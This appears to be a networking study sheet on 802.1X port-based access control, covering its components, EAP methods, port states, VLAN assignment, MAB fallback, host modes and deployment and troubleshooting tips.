802.1X

802.1X Port-Based Network Access Control

Authentication framework that controls network access at the port level before allowing devices onto the network
Uses three key components working together: Supplicant (client device), Authenticator (network switch/AP), and Authentication Server (typically RADIUS)
Operates at Layer 2, making access decisions before IP addresses are assigned or network resources become available

Supplicant initiates connection by sending EAPoL (EAP over LAN) Start frame
Authenticator places port in unauthorized state and forwards authentication requests between supplicant and authentication server
Authentication Server validates credentials using methods like EAP-TLS, PEAP, or EAP-TTLS
Upon successful authentication, authenticator moves port to authorized state allowing normal network traffic

Component	Role	Examples
Supplicant	Client requesting network access	Windows/Mac built-in clients, network adapters
Authenticator	Network device controlling access	Cisco switches, wireless access points
Authentication Server	Validates user credentials	Cisco ISE, Microsoft NPS, FreeRADIUS

Method	Security Level	Certificate Requirements	Use Case
EAP-TLS	Highest	Client + Server certs	High-security environments
PEAP	Medium-High	Server cert only	Common enterprise deployment
EAP-TTLS	Medium-High	Server cert only	Mixed client environments
EAP-MD5	Low	None	Legacy/testing only

Unauthorized State: Only EAPoL and certain control traffic allowed (DHCP, DNS may be permitted based on configuration)
Authorized State: Full network access granted based on authentication results and any applied authorization policies
Force-Authorized: Bypass 802.1X entirely (port always open)
Force-Unauthorized: Port permanently blocked regardless of authentication attempts

Dynamic VLAN Assignment: Authentication server returns VLAN ID based on user/device identity
Guest VLAN: Pre-configured VLAN for devices that fail authentication or don’t support 802.1X
Critical VLAN: Backup VLAN when authentication server is unreachable (maintains network connectivity)
Restricted VLAN: Limited access VLAN for devices with authentication issues

Wired Networks: Prevents unauthorized devices from accessing network ports (conference rooms, public areas)
Wireless Networks: Authenticates users before providing network access (WPA2/WPA3-Enterprise)
MAC Authentication Bypass (MAB): Fallback method for devices without 802.1X support (printers, phones, cameras)
Multi-Domain Authentication: Supports both data and voice VLANs on same physical port

Host Mode Settings: Single-host (one device), multi-host (multiple devices after first authenticates), or multi-auth (each device authenticates separately)
Timeout Values: Configure appropriate timeouts for authentication attempts and re-authentication intervals
Fallback Methods: Configure MAB or guest VLAN access for non-802.1X capable devices
Port Security Integration: Can work alongside port security features for additional protection

802.1X provides authentication (who you are) but relies on other systems for authorization (what you can access) - typically handled by RADIUS attributes or VLAN assignments
Critical limitation: Only as secure as the authentication method used - avoid EAP-MD5 in production environments due to vulnerability to dictionary attacks
Wake-on-LAN consideration: May require special configuration since magic packets need to traverse unauthorized ports
Troubleshooting tip: Use show dot1x all to verify configuration and debug dot1x events to monitor authentication process
Best practice: Implement certificate-based authentication (EAP-TLS) for highest security, but balance with deployment complexity
Remember that 802.1X secures the initial access to the network - additional security measures needed for ongoing traffic protection
Deployment strategy: Start with monitor mode to understand device behavior before enforcing authentication requirements